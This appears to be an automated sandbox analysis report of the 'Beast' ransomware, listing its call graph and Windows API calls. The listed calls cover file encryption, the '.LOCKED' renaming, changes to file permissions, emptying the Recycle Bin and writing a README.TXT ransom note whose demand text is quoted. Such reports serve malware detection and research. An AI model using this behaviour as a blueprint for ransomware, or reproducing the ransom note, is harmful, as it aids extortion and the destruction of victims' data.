72465 5c59bb 72458->72465 72466 5ca715 16 API calls 72458->72466 72459 5c5bc2 72739 5c7ccb CryptReleaseContext 72459->72739 72460->72452 72712 5c9e62 AllocateAndInitializeSid 72460->72712 72467 5c9e62 3 API calls 72461->72467 72462->72458 72477 5c7183 5 API calls 72464->72477 72465->72425 72472 5c6a84 82 API calls 72465->72472 72466->72465 72473 5c5992 72467->72473 
72474 5c5ab0 Sleep 72468->72474 72469 5c5bc7 72740 5c1a01 DeleteCriticalSection 72469->72740 72478 5c59c8 72472->72478 72473->72453 72482 5cb87a 31 API calls 72473->72482 72474->72457 72476 5c5bcc 72741 5c6f36 7 API calls 72476->72741 72486 5c5afc 72477->72486 72481 5c6bf0 15 API calls 72478->72481 72480 5cbb5f 20 API calls 72480->72452 72481->72425 72482->72453 72483 5c5bd1 72742 5ca624 FreeLibrary 72483->72742 72485 5c5bd6 72743 5c8c37 7 API calls 72485->72743 72488 5c5b01 72486->72488 72496 5c5b16 72486->72496 72489 5c9f0e 3 API calls 72488->72489 72493 5c5b06 Sleep 72489->72493 72490 5c5bdb 72744 5c6a4a WSACleanup DeleteCriticalSection 72490->72744 72491 5c5b60 72736 5ca63c 7 API calls 72491->72736 72493->72486 72495 5c5be0 72745 5d1a8a DestroyWindow 72495->72745 72496->72491 72499 5caf2d 20 API calls 72496->72499 72498 5c5be5 72499->72491 72500->72355 72501->72361 72502->72359 72503->72349 72504->72352 72505->72356 72506->72378 72507->72380 72508->72383 72509->72381 72510->72388 72512 675b29 72511->72512 72513 675b20 72511->72513 72512->72394 72516 675a16 51 API calls 4 library calls 72513->72516 72515->72394 72516->72512 72518 5cadfb 72517->72518 72518->72518 72519 5c55fe 72518->72519 72520 5cae47 72518->72520 72522 5caeb5 GetSystemDefaultUILanguage 72519->72522 72521 5caea4 MessageBoxA ExitProcess 72520->72521 72523 5caf15 72522->72523 72524 5caf24 ExitProcess 72523->72524 72525 5c5603 72523->72525 72526 5c8e2e 72525->72526 72527 5c8ed8 72526->72527 72527->72527 72528 5c8eed StrStrA 72527->72528 72529 5c9135 72528->72529 72530 5c8f08 72528->72530 72529->72401 72531 5c8f34 GetCommandLineW CommandLineToArgvW 72530->72531 72531->72529 72534 5c8f59 72531->72534 72532 5c933d StrToIntW 72532->72534 72533 5c9f53 2 API calls 72533->72534 72534->72529 72534->72532 72534->72533 72535 5c9232 72534->72535 72535->72534 72537 5c9245 72535->72537 72746 5c9d60 11 API calls 72535->72746 72538 5c92b6 MessageBoxA ExitProcess 72537->72538 72540 5c74fc 72539->72540 72540->72540 
72541 5c7507 CryptAcquireContextA 72540->72541 72542 5c7528 CryptAcquireContextA 72541->72542 72543 5c7be4 72541->72543 72542->72543 72545 5c76f3 CryptAcquireContextA 72542->72545 72543->72404 72545->72543 72547 5c7912 CryptAcquireContextA 72545->72547 72547->72543 72550 5c6cce 72549->72550 72551 5c5649 72549->72551 72747 5c6c41 GetCurrentProcess OpenProcessToken 72550->72747 72568 5ca0b9 72551->72568 72554 5c6dbc GetComputerNameW 72554->72551 72555 5c6ddd lstrcatW lstrlenW GetUserNameW 72554->72555 72555->72551 72557 5c6e4b 72555->72557 72752 5c5c2d RtlAllocateHeap 72557->72752 72559 5c6e52 72559->72551 72560 5c6e5f LookupAccountNameW 72559->72560 72561 5c6f1c 72560->72561 72562 5c6e8f InitializeSecurityDescriptor 72560->72562 72561->72551 72753 5c5cd2 RtlFreeHeap 72561->72753 72562->72561 72563 5c6e9e SetSecurityDescriptorDacl 72562->72563 72563->72561 72564 5c6eaf SetSecurityDescriptorOwner 72563->72564 72564->72561 72566 5c6ec4 BuildTrusteeWithSidW InitializeCriticalSection 72564->72566 72566->72551 72569 5ca14b 72568->72569 72569->72569 72570 5ca160 LoadLibraryA 72569->72570 72571 5c564e 72570->72571 72572 5ca17a GetProcAddress 72570->72572 72587 5c7109 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 72571->72587 72574 5ca236 72572->72574 72574->72574 72575 5ca249 GetProcAddress 72574->72575 72576 5ca289 72575->72576 72576->72576 72577 5ca294 GetProcAddress 72576->72577 72578 5ca32a 72577->72578 72578->72578 72579 5ca33f GetProcAddress 72578->72579 72580 5ca38a 72579->72580 72580->72580 72581 5ca39d GetProcAddress 72580->72581 72582 5ca3bd 72581->72582 72583 5ca476 FreeLibrary 72581->72583 72582->72583 72584 5ca3e9 GetCurrentProcess GetProcessId 72582->72584 72583->72571 72585 5ca455 72584->72585 72585->72585 72586 5ca460 GetEnvironmentVariableW 72585->72586 72586->72571 72587->72410 72754 5c7109 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 72588->72754 72590 5c87f9 72755 5c7109 InitializeCriticalSection 
EnterCriticalSection LeaveCriticalSection 72590->72755 72592 5c8803 72756 5c7109 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 72592->72756 72594 5c880d 72595 5c1000 6 API calls 72594->72595 72596 5c881c 72595->72596 72597 5c1000 6 API calls 72596->72597 72598 5c882b 72597->72598 72599 5c1000 6 API calls 72598->72599 72600 5c883a InitializeCriticalSection 72599->72600 72601 5c8892 72600->72601 72601->72601 72602 5c88a5 lstrcpyW 72601->72602 72603 5c8946 72602->72603 72603->72603 72604 5c8962 lstrcpyW 72603->72604 72605 5c8a29 72604->72605 72605->72605 72606 5c8a3e lstrcpyW 72605->72606 72607 5c8b03 72606->72607 72607->72607 72608 5c8b18 lstrcpyW 72607->72608 72609 5c8b6a 72608->72609 72609->72609 72610 5c8b75 lstrcpyW 72609->72610 72611 5c8c0f 72610->72611 72611->72611 72612 5c8c24 lstrcpyW 72611->72612 72612->72412 72614 5cecf7 #17 GetModuleHandleW 72613->72614 72615 5d1a83 72613->72615 72757 5cc34e 72614->72757 72615->72414 72617 5cedc3 lstrcpyW 72759 5c5c09 72617->72759 72619 5cee95 lstrcpyW RegisterClassW CreateWindowExW 72619->72615 72620 5cef3b RtlAllocateHeap 72619->72620 72621 5d1a6f 72620->72621 72622 5cef63 HeapAlloc 72620->72622 72621->72615 72623 5d1a78 HeapFree 72621->72623 72624 5cef7f InitializeCriticalSection CreateMenu CreatePopupMenu 72622->72624 72625 5d1a5b 72622->72625 72623->72615 72761 5d1f3c 72624->72761 72625->72615 72627 5d1a64 HeapFree 72625->72627 72627->72621 72628 5cf063 AppendMenuW 72763 5d1f2d 72628->72763 72632 5cf284 AppendMenuW 72767 5d1f1e 72632->72767 72634 5cf2eb AppendMenuW CreatePopupMenu 72769 5d1ded 72634->72769 72638 5cf5a8 AppendMenuW CreatePopupMenu 72773 5d1efa 72638->72773 72655 5d1e22 72656 5d0077 AppendMenuW 72655->72656 72789 5d1db8 72656->72789 72658 5d02b1 AppendMenuW CreatePopupMenu 72791 5d1d43 72658->72791 72660 5d0327 AppendMenuW 72793 5d1e11 72660->72793 72663 5d0781 72664 5d0868 CreateWindowExW GetWindowRect GetWindowRect 72663->72664 72665 5d1db8 72664->72665 72666 5d0abc 
CreateWindowExW SendMessageW SendMessageW 72665->72666 72667 5d0b7d 72666->72667 72668 5d0cb0 CreateWindowExW 72667->72668 72795 5d1da9 72668->72795 72670 5d0dff CreateWindowExW 72797 5d1d85 72670->72797 72672 5d0fc9 CreateWindowExW 72799 5d1d64 72672->72799 72674 5d1122 CreateWindowExW 72675 5c5c09 72674->72675 72676 5d121d CreateWindowExW 72675->72676 72677 5d1d43 72676->72677 72678 5d12b5 CreateWindowExW 72677->72678 72801 5d1d34 72678->72801 72680 5d1351 CreateWindowExW 72681 5d1382 72680->72681 72682 5d1483 GetWindowRect CreateWindowExW SendMessageW GetWindowRect 72681->72682 72803 5d1cf2 72682->72803 72684 5d1594 SendMessageW 72805 5d1cd1 72684->72805 72686 5d1653 6 API calls 72807 5d1cc2 72686->72807 72688 5d178f SendMessageW 72809 5d1cb3 72688->72809 72690 5d1829 SendMessageW 72811 5c951f 72690->72811 72692 5d1930 17 API calls 72692->72615 72813 5c5c2d RtlAllocateHeap 72693->72813 72695 5ca91d CommandLineToArgvW 72696 5c5837 72695->72696 72698 5ca93c 72695->72698 72696->72420 72709 5c73f4 EnterCriticalSection LeaveCriticalSection 72696->72709 72697 5ca916 72815 5c5cd2 RtlFreeHeap 72697->72815 72698->72696 72703 5c9f53 2 API calls 72698->72703 72704 5ca9ba 72698->72704 72700 5ca80c 72700->72695 72700->72697 72705 5ca89c 72700->72705 72702 5c9f53 2 API calls 72702->72705 72703->72698 72816 5ca9da 37 API calls __vfprintf_l 72704->72816 72705->72700 72705->72702 72707 5c7183 RtlAllocateHeap RtlFreeHeap EnterCriticalSection lstrcmpiW LeaveCriticalSection 72705->72707 72708 5d1b5f 9 API calls 72705->72708 72814 5c9f8a GetFileAttributesW 72705->72814 72707->72705 72708->72705 72709->72421 72710->72442 72711->72446 72713 5c9e98 CheckTokenMembership FreeSid 72712->72713 72714 5c5977 72712->72714 72713->72714 72714->72452 72714->72480 72716 5caf4c lstrlenA 72715->72716 72717 5cb216 72715->72717 72716->72717 72718 5caf61 InternetOpenW 72716->72718 72717->72431 72718->72717 72719 5caf79 MultiByteToWideChar 72718->72719 72720 5cafea 72719->72720 72720->72720 72721 

                                  APIs
                                  • #17.COMCTL32(?,?,00000000), ref: 005CECF7
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 005CECFF
                                  • lstrcpyW.KERNEL32(BEAST CLASS,00000000,?,?,00000000), ref: 005CEDCF
                                  • lstrcpyW.KERNEL32(Beast,00000000,?,?,00000000), ref: 005CEE9C
                                  • RegisterClassW.USER32(?), ref: 005CEEF3
                                  • CreateWindowExW.USER32(00000000,BEAST CLASS,Beast,00CF0000,80000000,80000000,00000258,000001F4,00000000,00000000,00000000), ref: 005CEF28
                                  • RtlAllocateHeap.NTDLL(00000008,00010000,?,?,00000000), ref: 005CEF4E
                                  • HeapAlloc.KERNEL32(00000008,00000200,?,?,00000000), ref: 005CEF70
                                  • InitializeCriticalSection.KERNEL32(006DA3EC,?,?,00000000), ref: 005CEF94
                                  • CreateMenu.USER32 ref: 005CEFA2
                                  • CreatePopupMenu.USER32 ref: 005CEFB3
                                  • AppendMenuW.USER32(00000010,00000000), ref: 005CF078
                                  • AppendMenuW.USER32(00000000,0000029A,00000000), ref: 005CF141
                                  • AppendMenuW.USER32(00000000,00000534,00000000), ref: 005CF292
                                  • AppendMenuW.USER32(00000000,00001236,00000000), ref: 005CF2F9
                                  • CreatePopupMenu.USER32 ref: 005CF2FB
                                  • AppendMenuW.USER32(00000010,00000000), ref: 005CF3F3
                                  • AppendMenuW.USER32(00000000,000007CE,00000000), ref: 005CF5B6
                                  • CreatePopupMenu.USER32 ref: 005CF5B8
                                  • AppendMenuW.USER32(00000010,00000000), ref: 005CF6CE
                                  • AppendMenuW.USER32(00000000,00000A68,00000000), ref: 005CF838
                                  • AppendMenuW.USER32(00000000,00000D02,00000000), ref: 005CF91B
                                  • AppendMenuW.USER32(00000000,00000F9C,00000000), ref: 005CFA2A
                                  • CreatePopupMenu.USER32 ref: 005CFA2C
                                  • AppendMenuW.USER32(00000010,00000000), ref: 005CFAA7
                                  • AppendMenuW.USER32(00000000,000014D0,00000000), ref: 005CFC16
                                  • AppendMenuW.USER32(00000000,0000176A,00000000), ref: 005CFD82
                                  • AppendMenuW.USER32(00000000,00001A04,00000000), ref: 005CFF4C
                                  • AppendMenuW.USER32(00000000,00001C9E,00000000), ref: 005D0084
                                  • AppendMenuW.USER32(00000000,00001F38,00000000), ref: 005D02BE
                                  • CreatePopupMenu.USER32 ref: 005D02C0
                                  • AppendMenuW.USER32(00000010,00000000), ref: 005D0336
                                  • AppendMenuW.USER32(00000000,0000246C,00000000), ref: 005D03A3
                                  • KiUserCallbackDispatcher.NTDLL ref: 005D03B1
                                  • GetWindowRect.USER32(0002044E,?), ref: 005D03CD
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50000000,0000000A,0000000A,?,00000014,?,00000000,005C0000,00000000), ref: 005D087F
                                  • GetWindowRect.USER32(0002044E,?), ref: 005D08A6
                                  • GetWindowRect.USER32(?), ref: 005D08C4
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50000000,0000000A,?,?,0000000F,?,00000000,005C0000,00000000), ref: 005D0AD2
                                  • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 005D0AED
                                  • SendMessageW.USER32(00000402,00000000,00000000), ref: 005D0AFE
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,00000028,000000AA,00000019,0002044E,00002706,005C0000,00000000), ref: 005D0CCD
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,00000046,000000AA,00000019,0002044E,000029A0,005C0000,00000000), ref: 005D0E1C
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,00000064,000000AA,00000019,0002044E,00002C3A,005C0000,00000000), ref: 005D0FE6
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,00000082,000000AA,00000019,0002044E,00002ED4,005C0000,00000000), ref: 005D1142
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,000000A0,000000AA,00000019,0002044E,0000316E,005C0000,00000000), ref: 005D123D
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,000000BE,000000AA,00000019,0002044E,00003408,005C0000,00000000), ref: 005D12D5
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,000000DC,000000AA,00000019,0002044E,000036A2,005C0000,00000000), ref: 005D1372
                                  • GetWindowRect.USER32(0002044E,?), ref: 005D149C
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,5080000D,000000BE,00000028,?,000000CD,0002044E,00000000,005C0000,00000000), ref: 005D14CF
                                  • SendMessageW.USER32(00000000,00001036,00000000,00014024), ref: 005D14EE
                                  • GetWindowRect.USER32(?), ref: 005D14FD
                                  • SendMessageW.USER32(00001061,00000000,00000006), ref: 005D15AE
                                  • SendMessageW.USER32(00001061,00000001,00000006), ref: 005D1669
                                  • GetWindowRect.USER32(0002044E,?), ref: 005D167F
                                  • GetWindowRect.USER32(?), ref: 005D16A4
                                  • CreateWindowExW.USER32(00000000,0000002C,00000000,5080000D,0000000A,000000FF,?,?,0002044E,00000000,005C0000,00000000), ref: 005D16D2
                                  • SendMessageW.USER32(00000000,00001036,00000000,00014021), ref: 005D16F0
                                  • GetWindowRect.USER32(?), ref: 005D16FF
                                  • SendMessageW.USER32(00001061,00000000,00000006), ref: 005D17AA
                                  • SendMessageW.USER32(00001061,00000001,00000006), ref: 005D1841
                                  • CreateFontW.GDI32(000000F4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 005D1941
                                  • SendMessageW.USER32(00000030,00000000,00000000), ref: 005D1957
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D1969
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D197B
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D198D
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D199F
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D19B1
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D19C3
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D19D5
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D19E7
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D19F9
                                  • RegisterHotKey.USER32(00000001,00000003,00000075,?,?,00000000), ref: 005D1A0E
                                  • RegisterHotKey.USER32(00000002,00000003,00000066,?,?,00000000), ref: 005D1A1B
                                  • RegisterHotKey.USER32(00000003,00000003,00000036,?,?,00000000), ref: 005D1A27
                                  • SetTimer.USER32(0000029A,0000000A,00000000), ref: 005D1A38
                                  • DragAcceptFiles.SHELL32(00000001), ref: 005D1A45
                                  • UpdateWindow.USER32 ref: 005D1A51
                                  • HeapFree.KERNEL32(00000000,015CDFD0,?,?,00000000), ref: 005D1A6D
                                  • HeapFree.KERNEL32(00000000,015DDFD8,?,?,00000000), ref: 005D1A81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  APIs
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CC7F9
                                  • SendMessageW.USER32(0000102B,00000000,?), ref: 005CC82D
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CC83D
                                  • DefWindowProcW.USER32(?,?,?,?), ref: 005CC855
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CC876
                                  • SendMessageW.USER32(0000102B,00000000,?), ref: 005CC8AA
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CC8BA
                                  • DestroyWindow.USER32(?), ref: 005CD96E
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000658E,00000000,00000000,00000000), ref: 005CDC32
                                  • SHEmptyRecycleBinW.SHELL32(00000000,00000000,00000007), ref: 005CDECF
                                  • SendMessageW.USER32(00000111,0000316E,00000000), ref: 005CDF60
                                  • SendMessageW.USER32(00001009,00000000,00000000), ref: 005CDF70
                                  • SendMessageW.USER32(00001009,00000000,00000000), ref: 005CDF7B
                                  • SendMessageW.USER32(00000402,00000000,00000000), ref: 005CDF8A
                                  • SendMessageW.USER32(00000111,0000316E,00000000), ref: 005CE000
                                  • SendMessageW.USER32(0000000C,00000000,0000005B), ref: 005CE067
                                  • SendMessageW.USER32(0000000C,00000000,?), ref: 005CE158
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE1AC
                                  • SendMessageW.USER32(00001073,00000000,?), ref: 005CE1ED
                                  • SendMessageW.USER32(0000102C,00000000,0000F000), ref: 005CE204
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE256
                                  • DestroyWindow.USER32(?), ref: 005CE2D6
                                  • MoveWindow.USER32(0000000A,0000000A,-00000023,00000014,00000001), ref: 005CE302
                                  • MoveWindow.USER32(000000BE,00000028,-000000D7,000000CD,00000001), ref: 005CE325
                                  • MoveWindow.USER32(0000000A,000000FF,-00000023,-0000015E,00000001), ref: 005CE350
                                  • MoveWindow.USER32(0000000A,-00000055,-00000023,0000000F,00000001), ref: 005CE375
                                  • SendMessageW.USER32(0000101E,00000000,?), ref: 005CE39E
                                  • SendMessageW.USER32(0000101E,00000000,?), ref: 005CE3BC
                                  • UnregisterHotKey.USER32(?,00000001), ref: 005CE3CC
                                  • UnregisterHotKey.USER32(?,00000002), ref: 005CE3D1
                                  • UnregisterHotKey.USER32(?,00000003), ref: 005CE3D6
                                  • KillTimer.USER32(?,0000029A), ref: 005CE3DE
                                  • DeleteObject.GDI32 ref: 005CE3EA
                                  • UnregisterClassW.USER32(BEAST CLASS), ref: 005CE3FB
                                  • DeleteCriticalSection.KERNEL32(006DA3EC), ref: 005CE42A
                                  • PostQuitMessage.USER32(00000012), ref: 005CE432
                                  • GetKeyState.USER32(00000012), ref: 005CE461
                                  • GetKeyState.USER32(00000011), ref: 005CE46C
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE4F5
                                  • SendMessageW.USER32(0000104D,00000000,00000001), ref: 005CE53C
                                  • SendMessageW.USER32(00001074,?,?,?), ref: 005CE56D
                                  • SendMessageW.USER32(00000115,00000007,00000000), ref: 005CE57D
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE5A4
                                  • SendMessageW.USER32(00001073,00000000,?), ref: 005CE5E5
                                  • EnterCriticalSection.KERNEL32(012FFC04), ref: 005CE60B
                                  • LeaveCriticalSection.KERNEL32(?), ref: 005CE663
                                  • __aulldiv.LIBCMT ref: 005CE6A3
                                  • __aulldvrm.LIBCMT ref: 005CE6E0
                                  • SendMessageW.USER32 ref: 005CE734
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE74B
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE78C
                                  • SendMessageW.USER32(00001073,00000000,?), ref: 005CE7CB
                                  • lstrcmpiW.KERNEL32(?), ref: 005CE7D8
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE7F3
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE826
                                  • SendMessageW.USER32(0000104D,00000000,00000001), ref: 005CE88E
                                  • SendMessageW.USER32(00001074,?,00000001), ref: 005CE8BF
                                  • ShowWindow.USER32(?,00000000), ref: 005CE932
                                  • SendMessageW.USER32(0000069C,%D-D,?), ref: 005CEAA6
                                  • ShowWindow.USER32(?,00000005), ref: 005CEABA
                                  • PostMessageW.USER32(0000069B,00000000,00000000), ref: 005CEAD9
                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005CEBDD
                                  • DragQueryFileW.SHELL32(?,?,00000000,00008000), ref: 005CEC02
                                  • SendMessageW.USER32(0000102B,?,00000001), ref: 005CE8DB
                                    • Part of subcall function 005C5CD2: RtlFreeHeap.NTDLL(00000000,00000000,005C60D8), ref: 005C5CDB
                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005CEC5B

                                  APIs
                                  • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000), ref: 005CBB83
                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 005CBBA1
                                  • CoCreateInstance.OLE32(006C449C,00000000,00000001,006C43CC,?), ref: 005CBBC6
                                  • GetNativeSystemInfo.KERNEL32(?), ref: 005CBBCF
                                  • CoCreateInstance.OLE32(006C44AC,00000000,00000001,006C440C,?), ref: 005CBBF4
                                  • VariantInit.OLEAUT32(?), ref: 005CBC05

                                  APIs
                                  • CryptAcquireContextA.ADVAPI32(006D9868,00000000,00000005,00000018,F0000000,?,00000000), ref: 005C751E
                                  • CryptAcquireContextA.ADVAPI32(006D9868,00000000,00000020,00000018,F0000008,?,00000000), ref: 005C76E9
                                  • CryptAcquireContextA.ADVAPI32(006D9868,00000000,0000000B,00000018,F0000000,?,00000000), ref: 005C7908
                                  • CryptAcquireContextA.ADVAPI32(006D9868,00000000,?,00000018,F0000008,?,00000000), ref: 005C7BD8
                                  APIs
                                  • GetFileAttributesW.KERNEL32(00000000,75920F00,00000000,00000000), ref: 005C1A7F
                                  • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 005C1A97
                                  • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 005C1AAA
                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 005C1ABE
                                  • GetLastError.KERNEL32 ref: 005C1ACA
                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 005C1AFB
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 005C1B1A
                                  • ReadFile.KERNEL32(00000000,?,0000001E,?,00000000), ref: 005C1BB6
                                  • SetFilePointerEx.KERNELBASE(00000000,0000009E,000000FF,00000000,00000002), ref: 005C1BE6
                                  • ReadFile.KERNELBASE(00000000,?,00000038,?,00000000), ref: 005C1BFF
                                  • ReadFile.KERNELBASE(00000000,?,00000014,?,00000000), ref: 005C1C1A
                                  • ReadFile.KERNELBASE(00000000,?,00000016,?,00000000), ref: 005C1C33
                                    • Part of subcall function 005C7054: EnterCriticalSection.KERNEL32(006D9828,00000000,?,?,?,005C1AE6), ref: 005C7071
                                    • Part of subcall function 005C7054: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000001,00000000,00000000,00000000,?,?,005C1AE6), ref: 005C7085
                                    • Part of subcall function 005C7054: GetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,?,00000000,?,?,?,005C1AE6), ref: 005C70A4
                                    • Part of subcall function 005C7054: SetEntriesInAclW.ADVAPI32(00000001,006D9844,?,005C1AE6,?,?,005C1AE6), ref: 005C70BC
                                    • Part of subcall function 005C7054: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,005C1AE6,00000000,?,?,005C1AE6), ref: 005C70D1
                                    • Part of subcall function 005C7054: LocalFree.KERNEL32(00000000), ref: 005C70EB
                                    • Part of subcall function 005C7054: LocalFree.KERNEL32(00000000), ref: 005C70F6
                                    • Part of subcall function 005C7054: LeaveCriticalSection.KERNEL32(006D9828), ref: 005C70FD
                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000002), ref: 005C1CD4
                                  • SetFilePointerEx.KERNEL32(00000000,FFFFFDA0,000000FF,00000000,00000001), ref: 005C1CE7
                                  • ReadFile.KERNEL32(00000000,?,00000260,?,00000000), ref: 005C1D03
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C1DFE
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C1E1B
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C1E71
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00020000,00000000,00000000,?,00020000,00000000), ref: 005C1EFF
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,?,00000000,00000000,?,00020000,00000000,00000000,?,?,00000000,?), ref: 005C1F24
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C1FDB
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 005C20D1
                                  • ReadFile.KERNEL32(?,?,00020000,00000000,00000000), ref: 005C20EB
                                  • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001), ref: 005C2118
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 005C212D
                                  • CloseHandle.KERNEL32(?), ref: 005C21DA
                                  • lstrcmpW.KERNEL32(?,?), ref: 005C2200
                                  • MoveFileW.KERNEL32(?,?), ref: 005C220E
                                  • lstrcpyW.KERNEL32(?,?), ref: 005C2224
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,00000064,00000000), ref: 005C226D
                                  • ReadFile.KERNEL32(?,?,00020000,?,00000000), ref: 005C22A1
                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000001), ref: 005C22DD
                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 005C22F2
                                  • SetFilePointerEx.KERNEL32(?,00020000,00000000,00000000,00000001), ref: 005C2314
                                  • lstrcpyW.KERNEL32(?,?), ref: 005C2352
                                  • lstrcatW.KERNEL32(?,.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED), ref: 005C2360
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 005C2705
                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 005C271D
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 005C2730
                                  • WriteFile.KERNEL32(?,?,0000001E,?,00000000), ref: 005C274B
                                  • WriteFile.KERNEL32(?,README.TXT,?,00000000), ref: 005C2761
                                  • WriteFile.KERNEL32(?,YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke,?,00000000), ref: 005C2777
                                  • WriteFile.KERNEL32(?,?,0000001E,?,00000000), ref: 005C278C
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 005C27A2
                                  • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 005C27B7
                                  • WriteFile.KERNEL32(?,?,00000010,?,00000000), ref: 005C27CC
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000002), ref: 005C27E7
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 005C27FC
                                  • WriteFile.KERNEL32(?,?,00000260,?,?), ref: 005C2830
                                  • WriteFile.KERNEL32(?,?,0000002E,?,00000000), ref: 005C2845
                                  • WriteFile.KERNEL32(?,README.TXT,?,00000000), ref: 005C285B
                                  • WriteFile.KERNEL32(?,?,0000002E,?,00000000), ref: 005C2870
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 005C2886
                                  • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 005C289B
                                  • WriteFile.KERNEL32(?,?,00000010,?,00000000), ref: 005C28B0
                                  • WriteFile.KERNEL32(?,?,00000038,?,00000000), ref: 005C28C5
                                  • WriteFile.KERNEL32(?,?,00000014,?,00000000), ref: 005C28DC
                                  • WriteFile.KERNEL32(?,?,00000016,?,00000000), ref: 005C28F1
                                  • lstrcatW.KERNEL32(?,?), ref: 005C298B
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000002), ref: 005C29AC
                                  • WriteFile.KERNEL32(?,?,00000260,?,00000000), ref: 005C29C8
                                  • lstrcatW.KERNEL32(?,README.TXT), ref: 005C2A0D
                                  Strings
                                  • fkW, xrefs: 005C23AB
